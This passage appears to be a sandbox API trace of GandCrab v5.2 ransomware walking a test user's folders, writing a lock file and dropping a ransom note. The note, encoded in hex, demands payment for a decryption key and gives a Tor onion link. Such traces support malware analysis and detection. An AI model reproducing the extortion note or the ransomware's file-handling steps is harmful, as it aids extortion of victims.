nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0094.091] CloseHandle (hObject=0x2bc) returned 1 [0094.091] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.091] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.092] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x27, wMilliseconds=0x19b)) [0094.092] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.092] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0094.092] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0094.092] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\d2ca4a09d2ca4deb61a.lock") returned 84 [0094.092] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\dp__bieng9\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0094.093] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.094] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.094] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\") returned 60 [0094.094] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\*" [0094.094] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x503578 [0094.094] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.094] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0094.095] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.095] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.095] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0094.095] lstrcmpW (lpString1="3fMls7", lpString2=".") returned 1 [0094.095] lstrcmpW (lpString1="3fMls7", lpString2="..") returned 1 [0094.095] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\", lpString2="3fMls7" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7" [0094.095] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\" [0094.095] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0094.095] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0094.095] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0094.095] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0094.095] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0094.095] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0094.096] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0094.096] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0094.096] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0094.096] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.096] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.096] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\\\TITWMVJL-DECRYPT.txt") returned 88 [0094.096] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\dp__bieng9\\3fmls7\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0094.097] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x